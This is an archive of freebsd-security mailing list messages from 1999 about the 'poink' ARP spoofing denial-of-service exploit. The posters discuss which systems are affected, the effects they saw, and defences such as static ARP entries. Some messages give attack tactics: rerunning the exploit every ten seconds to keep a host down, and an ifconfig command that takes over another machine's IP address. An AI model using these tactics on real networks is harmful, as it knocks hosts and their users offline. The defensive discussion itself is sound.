say, 10 seconds? (it takes little bandwidth, and 10 seconds is nothing).. and the machine is dead, and will stay dead... -Chris On Mon, 19 Apr 1999, Rajit Manohar wrote: > > Hi all, > > I just tested poink on FreeBSD 3.1-RELEASE, and the machine has a > minor problem and then recovers. As people pointed out, arp is arp and > it really shouldn't hose systems much. I haven't tried out extensive > tests yet... maybe later in the evening when I have more time. :) > > Here's my log file: > > Apr 19 14:39:32 /kernel: arp: is using my IP address ! > Apr 19 14:39:32 last message repeated 16 times > Apr 19 14:39:32 /kernel: > Apr 19 14:39:32 /kernel: arp: is using my IP address ! > Apr 19 14:39:32 last message repeated 2 times > > ( -> your machine, -> your ethernet addr, -> your > ip addr :) ) > > The next thing that happened was that ypbind complained for a bit (NIS > server not responding) and amd was unhappy. The machine always > responded to pings, but my home directory disappeared temporarily. In > about a minute, everything returned to normal (AFAIK). I'd guess that > a repeated-poink, or a poink of an nfs server would be a more serious > problem. > > -Rajit > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 12:12:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 55C351565E for ; Mon, 19 Apr 1999 12:12:41 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id PAA22030; Mon, 19 Apr 1999 15:09:51 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 19 Apr 1999 15:09:51 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Rodrigo Campos Cc: Liam Slusser , security@FreeBSD.ORG Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 19 Apr 1999, Rodrigo Campos wrote: > On Mon, 19 Apr 1999, Liam Slusser wrote: > > > In a earlier email Chris > > said his fbsd 3.x was affected...and also said arp errors in > > /var/log/messages in 2.2.5....but this looks like a WinNT/9x DoS from > > the geek-girl report here. Is fbsd affected..and if so..what versions? > > Thanks! ;) > > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all > they are vulnerable, it's not a big threat anyway, as you have to be on > the same ethernet to use the exploit. And mind you, we are only vulnerable in the sense that we use the arp service, which supports no security in any form. :) Is there a way to disable arp resolution (and also detection of other clients on the same IP) and just use hard coded arp entries? This would certainly not be the default, but it would be nice if it were an option. Unfortunately ipfw presumably can't do anything as arp is below IP level. I really don't think this is a very big issue personally, although I can see restricted instances where you'd want to do something about it (i.e., shared untrusted network environments, or if one of n servers in a server pool on a particular ethernet is broken into). If we do add a sysctl to disable arp collision detection, then you'd also need for all machines on the ethernet to use hard coded arp mappings, or they would just obey the other guy's arp message and send messages to him. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 12:17: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from mozart.csl.cornell.edu (MOZART.CSL.CORNELL.EDU [132.236.71.20]) by hub.freebsd.org (Postfix) with ESMTP id 8664615713 for ; Mon, 19 Apr 1999 12:17:00 -0700 (PDT) (envelope-from rajit@csl.cornell.edu) Received: from mozart.csl.cornell.edu (localhost [127.0.0.1]) by mozart.csl.cornell.edu (8.9.3/8.9.2) with ESMTP id PAA03075 for ; Mon, 19 Apr 1999 15:14:31 -0400 (EDT) (envelope-from rajit@mozart.csl.cornell.edu) Message-Id: <199904191914.PAA03075@mozart.csl.cornell.edu> To: security@FreeBSD.ORG Subject: Re: poink and freebsd In-reply-to: Your message of "Mon, 19 Apr 1999 15:08:58 EDT." Date: Mon, 19 Apr 1999 15:14:31 -0400 From: Rajit Manohar Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> so, if you setup a timer to execute the poink sploit on the box every, >> say, 10 seconds? (it takes little bandwidth, and 10 seconds is nothing).. >> and the machine is dead, and will stay dead... >> >> -Chris Right. I'm sure that's what would happen. And a server would be worse, because all the clients would get hosed... (The same sort of thing happens if someone decides to plug a machine onto a subnet and uses someone else's IP address...) -Rajit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 12:24: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from intra.ispchannel.net (intra.ispchannel.net [208.166.60.21]) by hub.freebsd.org (Postfix) with ESMTP id 3E17415A77 for ; Mon, 19 Apr 1999 12:24:00 -0700 (PDT) (envelope-from nicole@ispchannel.net) Received: from dogbert.mediacity.com (dogbert.mediacity.com [208.138.36.140]) by intra.ispchannel.net (Postfix) with ESMTP id 97259F00C; Mon, 19 Apr 1999 12:21:34 -0700 (PDT) Content-Length: 1659 Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Mon, 19 Apr 1999 12:21:34 -0700 (PDT) Organization: The ISP Channel From: Nicole Harrington To: Rodrigo Campos Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) Cc: security@FreeBSD.ORG, Liam Slusser Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 19-Apr-99 Rodrigo Campos wrote: > On Mon, 19 Apr 1999, Liam Slusser wrote: > >> >> In a earlier email Chris >> said his fbsd 3.x was affected...and also said arp errors in >> /var/log/messages in 2.2.5....but this looks like a WinNT/9x DoS from >> the geek-girl report here. Is fbsd affected..and if so..what versions? >> Thanks! ;) >> > > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all > they are vulnerable, it's not a big threat anyway, as you have to be on > the same ethernet to use the exploit. > > Regards, > But what sort of access do you need. Can this be run on a shell acct without root privleges? Nicole > -- > ________________________ > Rodrigo Albani de Campos > Matrix Internet - NOC > - Be a "Glad I Did" instead of a "Wish I Had" - > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message # The statements made above do not necessarily represent those of MCW/ISPC. # # However I am working on it. # |\ __ /| (`\ | o_o |__ ) ) // \\ Nicole Harrington | SR Systems Administrator -------------------(((---(((----------------------- nicole@mediacity.com - nicole@ispchannel.com www.mediacity.com - www.ispchannel.com Phone: 650-237-1454 - Pager: 415-301-2482 Powered By Coca-Cola and FreeBSD I'm not ADD I'm just MultiThreaded! Microsoft: What bug would you like today? ---------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 12:36:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from andyo.prime.net (P3M2.prime.net.ua [195.64.229.234]) by hub.freebsd.org (Postfix) with ESMTP id 5380215695; Mon, 19 Apr 1999 12:34:42 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost [127.0.0.1]) by andyo.prime.net (8.8.7/8.8.7) with ESMTP id WAA00384; Mon, 19 Apr 1999 22:33:01 +0300 (EET DST) (envelope-from andyo@prime.net.ua) Message-ID: <371B84E8.C50BF21D@prime.net.ua> Date: Mon, 19 Apr 1999 22:32:59 +0300 From: =?koi8-r?Q?=E1=CE=C4=D2=C5=CA=20=F7=2E=20=EF=CC=C5=CA=CE=C9=CB?= (Andy V. Oleynik) Reply-To: andyo@prime.net.ua Organization: =?koi8-r?Q?=ED=2D=E9=CE=C6=CF?= X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.5-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: HAPPY99 warm spamer detected Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've received it at satterday, reject it in /etc/mail/access. Received: from hub.freebsd.org (hub.FreeBSD.ORG [204.216.27.18]) by mail.prime.net.ua (8.9.3/8.9.1) with ESMTP id RAA01253 for ; Sat, 17 Apr 1999 17:31:57 +0300 (EEST) Received: by hub.freebsd.org (Postfix, from userid 538) id C2CA515020; Sat, 17 Apr 1999 07:32:09 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with SMTP id A23E51CD676; Sat, 17 Apr 1999 07:32:09 -0700 (PDT) (envelope-from owner-freebsd-questions) Received: by hub.freebsd.org (bulk_mailer v1.12); Sat, 17 Apr 1999 07:32:09 -0700 Delivered-To: freebsd-questions@freebsd.org Received: from lucy.ddyne.com (mail.ddyne.com [199.78.56.3]) by hub.freebsd.org (Postfix) with ESMTP id 3E11A150FD for ; Sat, 17 Apr 1999 07:32:01 -0700 (PDT) (envelope-from lholcombe@ddyne.com) Received: from lholcombe (unverified [199.78.56.75]) by lucy.ddyne.com (Rockliffe SMTPRA 2.1.7) with SMTP id ; Sat, 17 Apr 1999 09:42:20 -0500 Date: Sat, 17 Apr 1999 09:42:20 -0500 Message-ID: From: "Lane Holcombe" Subject: Fw: How to boot freebsd? X-Spanska: Yes Sender: owner-freebsd-questions@FreeBSD.ORG X-Loop: FreeBSD.ORG Precedence: bulk To: undisclosed-recipients: ; X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 89157baa06e7dad1f9e1900632028a69 Happy99.exe Content-Type: application/octet-stream Content-Transfer-Encoding: x-uuencode Content-Disposition: inline; filename="Happy99.exe" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message -- Andy V. Oleynik (When U aim for perfection, U discover it's a moving target ö80) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 12:56:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from speed.matrix.com.br (speed.matrix.com.br [200.202.17.241]) by hub.freebsd.org (Postfix) with ESMTP id 45B57157B0 for ; Mon, 19 Apr 1999 12:56:11 -0700 (PDT) (envelope-from camposr@MATRIX.COM.BR) Received: from localhost (speed@localhost) by speed.matrix.com.br (8.9.3/8.9.3) with ESMTP id QAA10125; Mon, 19 Apr 1999 16:51:57 -0300 (EST) X-Authentication-Warning: speed.matrix.com.br: speed owned process doing -bs Date: Mon, 19 Apr 1999 16:51:57 -0300 (EST) From: Rodrigo Campos X-Sender: speed@speed.matrix.com.br To: Nicole Harrington Cc: security@FreeBSD.ORG, Liam Slusser Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: Message-ID: Organization: Matrix Network MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 19 Apr 1999, Nicole Harrington wrote: > > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all > > they are vulnerable, it's not a big threat anyway, as you have to be on > > the same ethernet to use the exploit. > > > > Regards, > > But what sort of access do you need. Can this be run on a shell acct without > root privleges? > As far as I know, you have to be root to run the exploit, as it uses raw packets. But you can send these kind of packets with some kind of Windows 9x/NT network analisys tool, I can't remember the name right now, but of course any user can do it from a Windows box, regardless of his privileges (Well, Windows has no privilege control anyway). I think it would be very simple for a Winsock programmer to port the exploit, so any windows user could run it inside your network, hrmmm, it could be dangerous... :/ I've tested the exploit against MacOS 8.5.1 and Solaris 7/i386, they both are vulnerable. The Solaris box just couldn't access anything outside its own network after that. The Windows 9x/NT boxes rebooted with a heavy loaded attack. Regards, -- ________________________ Rodrigo Albani de Campos Matrix Internet - NOC - Be a "Glad I Did" instead of a "Wish I Had" - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 13:57:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 106F81551A for ; Mon, 19 Apr 1999 13:57:43 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA59776; Mon, 19 Apr 1999 14:54:59 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA27522; Mon, 19 Apr 1999 14:54:56 -0600 (MDT) Message-Id: <199904192054.OAA27522@harmony.village.org> To: Rajit Manohar Subject: Re: poink and freebsd Cc: security@FreeBSD.ORG In-reply-to: Your message of "Mon, 19 Apr 1999 14:54:18 EDT." <199904191854.OAA02778@mozart.csl.cornell.edu> References: <199904191854.OAA02778@mozart.csl.cornell.edu> Date: Mon, 19 Apr 1999 14:54:56 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199904191854.OAA02778@mozart.csl.cornell.edu> Rajit Manohar writes: : about a minute, everything returned to normal (AFAIK). I'd guess that : a repeated-poink, or a poink of an nfs server would be a more serious : problem. Sounds like your typical "Let's claim to be someone else and confuse everybody" DOS that has been well know since at least the late 80's, if not before. arp has no authentication in it, so short of hard wiring the arp cache on all your machines, I don't think there is much that can be done about this. Even detecting that it is going on and keeping the right address is going to be hard in the face of a more demented attack from cards that allow one to set one's own NIC address. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 13:58:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5696415680 for ; Mon, 19 Apr 1999 13:58:52 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA59798; Mon, 19 Apr 1999 14:56:07 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA27578; Mon, 19 Apr 1999 14:56:02 -0600 (MDT) Message-Id: <199904192056.OAA27578@harmony.village.org> To: Robert Watson Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) Cc: Rodrigo Campos , Liam Slusser , security@FreeBSD.ORG In-reply-to: Your message of "Mon, 19 Apr 1999 15:09:51 EDT." References: Date: Mon, 19 Apr 1999 14:56:02 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Robert Watson writes: : Is there a way to disable arp resolution (and also detection of other : clients on the same IP) and just use hard coded arp entries? This would : certainly not be the default, but it would be nice if it were an option. Yes. Once can add permanant ARP entries. But recall that you need to do this on all clients of the victum machine. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 14: 2:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7F76815636 for ; Mon, 19 Apr 1999 14:02:42 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA59823; Mon, 19 Apr 1999 14:59:57 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA27640; Mon, 19 Apr 1999 14:59:53 -0600 (MDT) Message-Id: <199904192059.OAA27640@harmony.village.org> To: Rodrigo Campos Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) Cc: Nicole Harrington , security@FreeBSD.ORG, Liam Slusser In-reply-to: Your message of "Mon, 19 Apr 1999 16:51:57 -0300." References: Date: Mon, 19 Apr 1999 14:59:53 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Rodrigo Campos writes: : I've tested the exploit against MacOS 8.5.1 and Solaris 7/i386, they both : are vulnerable. The Solaris box just couldn't access anything outside its : own network after that. Define vulnerable. APR has no security in it whatsoever[*], so there is *NO* way to effectively defend against this attack w/o keeping a database if NIC addresses in sync with IP addresses. ARP does this dynamically so you can swap out ethernet cards and the like w/o major headache. To work around this attack is fairly simple: Just add arp entries by hand (they will be permanant) when you boot your clients. Warner [*] Apart from the implicit trust of all machines on a physical wire. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 14:13:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from biggusdiskus.flyingfox.com (parker-T1-2-gw.sf3d.best.net [209.157.165.30]) by hub.freebsd.org (Postfix) with ESMTP id 1951E1545B for ; Mon, 19 Apr 1999 14:13:52 -0700 (PDT) (envelope-from jas@flyingfox.com) Received: (from jas@localhost) by biggusdiskus.flyingfox.com (8.8.8/8.8.5) id PAA04114; Mon, 19 Apr 1999 15:15:25 -0700 (PDT) Date: Mon, 19 Apr 1999 15:15:25 -0700 (PDT) From: Jim Shankland Message-Id: <199904192215.PAA04114@biggusdiskus.flyingfox.com> To: camposr@MATRIX.COM.BR, imp@harmony.village.org Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) Cc: liam@tiora.net, nicole@ispchannel.net, security@FreeBSD.ORG In-Reply-To: <199904192059.OAA27640@harmony.village.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh writes: > Define vulnerable. ARP has no security in it whatsoever[*], so there > is *NO* way to effectively defend against this attack w/o keeping a > database .... Bingo. Note the close cousin of poink, the "ifconfig attack": ifconfig fxp0 And you don't even need libnet, or whatever it was called. Jim Shankland NLynx Systems, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 14:17:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 1CB7D14D11 for ; Mon, 19 Apr 1999 14:17:23 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id XAA05984; Mon, 19 Apr 1999 23:14:56 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id XAA20358; Mon, 19 Apr 1999 23:14:50 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Warner Losh Cc: Rajit Manohar , security@FreeBSD.ORG Subject: Re: poink and freebsd In-reply-to: Your message of "Mon, 19 Apr 1999 14:54:56 MDT." <199904192054.OAA27522@harmony.village.org> Date: Mon, 19 Apr 1999 23:14:50 +0200 Message-ID: <20356.924556490@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199904192054.OAA27522@harmony.village.org>, Warner Losh writes: >In message <199904191854.OAA02778@mozart.csl.cornell.edu> Rajit Manohar writes: >: about a minute, everything returned to normal (AFAIK). I'd guess that >: a repeated-poink, or a poink of an nfs server would be a more serious >: problem. > >Sounds like your typical "Let's claim to be someone else and confuse >everybody" DOS that has been well know since at least the late 80's, >if not before. arp has no authentication in it, so short of hard >wiring the arp cache on all your machines, I don't think there is much >that can be done about this. Actually there is. Instead of bailing in this case, send the originator an arp packet and ask if they're serious. If the don't answer ignore the entire event. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 17:30:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 6138D14C10 for ; Mon, 19 Apr 1999 17:30:33 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id UAA23674; Mon, 19 Apr 1999 20:28:03 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: imp@harmony.village.org (Warner Losh) Cc: security@FreeBSD.ORG Subject: Re: poink and freebsd Date: Tue, 20 Apr 1999 00:37:43 GMT Message-ID: <371bcc18.1480010513@mail.sentex.net> References: <199904191854.OAA02778@mozart.csl.cornell.edu> In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Sounds like your typical "Let's claim to be someone else and confuse >everybody" DOS that has been well know since at least the late 80's, >if not before. arp has no authentication in it, so short of hard >wiring the arp cache on all your machines, I don't think there is much >that can be done about this. Even detecting that it is going on and Would not a switch that lets you hard code allowed mac addresses help in this case ? ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 17:34:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id B5C5414D21 for ; Mon, 19 Apr 1999 17:34:49 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA60390; Mon, 19 Apr 1999 18:32:05 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA30038; Mon, 19 Apr 1999 18:32:04 -0600 (MDT) Message-Id: <199904200032.SAA30038@harmony.village.org> To: mike@sentex.net (Mike Tancsa) Subject: Re: poink and freebsd Cc: security@FreeBSD.ORG In-reply-to: Your message of "Tue, 20 Apr 1999 00:37:43 GMT." <371bcc18.1480010513@mail.sentex.net> References: <371bcc18.1480010513@mail.sentex.net> <199904191854.OAA02778@mozart.csl.cornell.edu> Date: Mon, 19 Apr 1999 18:32:04 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <371bcc18.1480010513@mail.sentex.net> Mike Tancsa writes: : Would not a switch that lets you hard code allowed mac addresses help in : this case ? You mean like arp -S host 1:2:3:4:5:6 pub? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 19:10: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from bogomatic.fredbox.com (cable-4-17-237-24.anchorageak.net [24.237.17.4]) by hub.freebsd.org (Postfix) with ESMTP id ADE601563D for ; Mon, 19 Apr 1999 19:09:55 -0700 (PDT) (envelope-from fred@fredbox.com) Received: from localhost (fred@localhost) by bogomatic.fredbox.com (8.8.8/8.8.8) with ESMTP id SAA13364; Mon, 19 Apr 1999 18:07:09 -0800 (AKDT) (envelope-from fred@fredbox.com) Date: Mon, 19 Apr 1999 18:07:09 -0800 (AKDT) From: "Frederick J Polsky v1.0" To: Rodrigo Campos Cc: Liam Slusser , security@FreeBSD.ORG Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Unfortunately in my case (and the case of others), I'm served with cable internet through GCI cable in Anchorage AK, which has its cable network set up such that it is just one large ethernet with some 1000+ users and no security whatsoever (most entertaining to connect a winbox to the network and click on Network Neighborhood and see all defined domains/workgroups...) I don't know about other cable internet providers but this would at least be a problem with mine. > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all > they are vulnerable, it's not a big threat anyway, as you have to be on > the same ethernet to use the exploit. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 19:29:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.andrew.cmu.edu (SMTP1.ANDREW.CMU.EDU [128.2.10.81]) by hub.freebsd.org (Postfix) with ESMTP id 59E2814F83 for ; Mon, 19 Apr 1999 19:29:30 -0700 (PDT) (envelope-from Harry_M_Leitzell@cmu.edu) Received: from unix48.andrew.cmu.edu (UNIX48.ANDREW.CMU.EDU [128.2.15.56]) by smtp1.andrew.cmu.edu (8.8.5/8.8.2) with SMTP id WAA08271; Mon, 19 Apr 1999 22:26:50 -0400 (EDT) Date: Mon, 19 Apr 1999 22:26:49 -0400 (EDT) From: "Harry M. Leitzell" X-Sender: Harry_M_Leitzell@unix48.andrew.cmu.edu Reply-To: "Harry M. Leitzell" To: "Frederick J Polsky v1.0" Cc: security@FreeBSD.ORG Subject: Re: poink attack (was Re: ARP problem in Windows9X/NT) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It also hits college campuses, which are a haven for misconfigured Linux machines that provide easy quick root access on the Local network. Not to say that CMU has this problem or anything like that. On Mon, 19 Apr 1999, Frederick J Polsky v1.0 wrote: > Unfortunately in my case (and the case of others), I'm served with cable > internet through GCI cable in Anchorage AK, which has its cable network > set up such that it is just one large ethernet with some 1000+ users and > no security whatsoever (most entertaining to connect a winbox to the > network and click on Network Neighborhood and see all defined > domains/workgroups...) I don't know about other cable internet providers > but this would at least be a problem with mine. > > > I tested it against freebsd 2.2.8 stable, 3.0 stable and 3.1 stable, all > > they are vulnerable, it's not a big threat anyway, as you have to be on > > the same ethernet to use the exploit. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] Harry M. Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 20 5:59:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 98C3814DB1 for ; Tue, 20 Apr 1999 05:59:47 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA01738; Tue, 20 Apr 1999 06:00:44 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda01736; Tue Apr 20 06:00:23 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id FAA64167; Tue, 20 Apr 1999 05:56:55 -0700 (PDT) Message-Id: <199904201256.FAA64167@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdU64161; Tue Apr 20 05:56:48 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: Chris Cc: The Tech-Admin Dude , security@FreeBSD.ORG Subject: Re: poink and freebsd In-reply-to: Your message of "Mon, 19 Apr 1999 13:10:08 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 20 Apr 1999 05:56:48 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Why not send a copy to security-officer@freebsd.org. Then it can be fixed. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" In message , Chris writes: > jd- > > id rather not post the source to the list, since this is how exploits get > distributed, and bad things occur. i sent email to the security-officer, > and a few people to test it out with their setup.. id rather not > distribute it any further... i hope you understand my reasoning behind it > :/ > > -Chris O'Hara > Systems Administration > > On Mon, 19 Apr 1999, The Tech-Admin Dude wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > Better yet, post a copy to the mailing list :-).. I have heard of it, 